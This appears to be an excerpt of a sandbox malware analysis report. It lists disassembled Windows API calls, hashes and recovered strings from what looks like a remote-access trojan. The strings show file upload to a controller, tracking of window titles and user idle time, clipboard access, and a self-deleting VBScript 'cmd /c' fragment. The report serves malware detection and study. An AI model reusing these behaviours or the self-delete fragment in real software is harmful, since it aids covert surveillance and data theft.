                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                      • API String ID: 3086580692-2582957567
                                                      • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                      • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                      • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                      • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                      APIs
                                                      • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                        • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                        • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                        • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                        • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                      • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                      • API String ID: 3795512280-1152054767
                                                      • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                      • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                      • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                      • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                      APIs
                                                      • connect.WS2_32(?,?,?), ref: 004048E0
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                      • WSAGetLastError.WS2_32 ref: 00404A21
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                      • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                      • API String ID: 994465650-3229884001
                                                      • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                      • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                      • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                      • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                      • _free.LIBCMT ref: 0045137F
                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                      • _free.LIBCMT ref: 004513A1
                                                      • _free.LIBCMT ref: 004513B6
                                                      • _free.LIBCMT ref: 004513C1
                                                      • _free.LIBCMT ref: 004513E3
                                                      • _free.LIBCMT ref: 004513F6
                                                      • _free.LIBCMT ref: 00451404
                                                      • _free.LIBCMT ref: 0045140F
                                                      • _free.LIBCMT ref: 00451447
                                                      • _free.LIBCMT ref: 0045144E
                                                      • _free.LIBCMT ref: 0045146B
                                                      • _free.LIBCMT ref: 00451483
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                      • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                      • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 0041A04A
                                                      • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                      • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                      • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                      • API String ID: 489098229-1431523004
                                                      • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                      • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                      • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                      • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                      APIs
                                                        • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                        • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                        • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                        • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                        • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                      • ExitProcess.KERNEL32 ref: 0040D9FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                      • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                      • API String ID: 1913171305-3159800282
                                                      • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                      • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                      • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                      • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                      • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                      • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                      • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                      APIs
                                                        • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                      • GetLastError.KERNEL32 ref: 00455D6F
                                                      • __dosmaperr.LIBCMT ref: 00455D76
                                                      • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                      • GetLastError.KERNEL32 ref: 00455D8C
                                                      • __dosmaperr.LIBCMT ref: 00455D95
                                                      • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                      • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                      • GetLastError.KERNEL32 ref: 00455F31
                                                      • __dosmaperr.LIBCMT ref: 00455F38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                      • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                      • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                      • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                      • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                      • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                      • __freea.LIBCMT ref: 0044AEB0
                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                      • __freea.LIBCMT ref: 0044AEB9
                                                      • __freea.LIBCMT ref: 0044AEDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                      • String ID: PkGNG$tC
                                                      • API String ID: 3864826663-4196309852
                                                      • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                      • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                      • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                      • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID: \&G$\&G$`&G
                                                      • API String ID: 269201875-253610517
                                                      • Opcode ID: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                                      • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                      • Opcode Fuzzy Hash: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                                      • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 65535$udp
                                                      • API String ID: 0-1267037602
                                                      • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                      • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                      • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                      • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                      • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                      • GetForegroundWindow.USER32 ref: 0040AD84
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                      • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                        • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                      • String ID: [${ User has been idle for $ minutes }$]
                                                      • API String ID: 911427763-3954389425
                                                      • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                      • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                      • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                      • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                      • API String ID: 82841172-425784914
                                                      • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                      • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                      • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                      • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                      • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                      • __dosmaperr.LIBCMT ref: 0043A926
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                      • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                      • __dosmaperr.LIBCMT ref: 0043A963
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                      • __dosmaperr.LIBCMT ref: 0043A9B7
                                                      • _free.LIBCMT ref: 0043A9C3
                                                      • _free.LIBCMT ref: 0043A9CA
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                      • String ID:
                                                      • API String ID: 2441525078-0
                                                      • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                      • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                      • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                      • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                      • TranslateMessage.USER32(?), ref: 0040557E
                                                      • DispatchMessageA.USER32(?), ref: 00405589
                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                      • API String ID: 2956720200-749203953
                                                      • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                      • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                      • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                      • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                      APIs
                                                        • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                      • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                      • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                      • String ID: 0VG$0VG$<$@$Temp
                                                      • API String ID: 1704390241-2575729100
                                                      • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                      • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                      • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                      • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                      APIs
                                                      • OpenClipboard.USER32 ref: 0041697C
                                                      • EmptyClipboard.USER32 ref: 0041698A
                                                      • CloseClipboard.USER32 ref: 00416990
                                                      • OpenClipboard.USER32 ref: 00416997
                                                      • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                      • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                      • CloseClipboard.USER32 ref: 004169BF
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                      • String ID: !D@
                                                      • API String ID: 2172192267-604454484
                                                      • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                      • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                      • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                      • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                      APIs
                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                      • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                      • CloseHandle.KERNEL32(?), ref: 004134A0
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                      • String ID:
                                                      • API String ID: 297527592-0
                                                      • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                      • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                      • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                      • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
